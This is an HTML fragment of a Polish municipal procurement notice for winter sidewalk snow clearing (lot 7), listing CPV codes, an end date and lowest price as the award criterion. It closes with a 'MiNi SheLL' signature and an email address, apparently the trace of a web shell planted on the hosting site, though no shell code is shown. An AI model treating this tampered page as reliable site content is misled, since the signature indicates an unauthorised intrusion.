<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-9, 62.62.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> świadczenie usług przy akcji zimowego utrzymania dróg poprzez ręczne odśnieżanie chodników.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość roboczo godzin na sezon wynosi 100
UWAGA: Dla każdej z części zamówienia, ilość jednostek pracy (roboczo godzin) jest wielkością umowną dla porównania złożonych ofert. Ostateczna ilość jednostek (roboczo godzin) uzależniona będzie od bieżącego zapotrzebowania wynikającego z panujących warunków pogodowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-9, 90.62.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com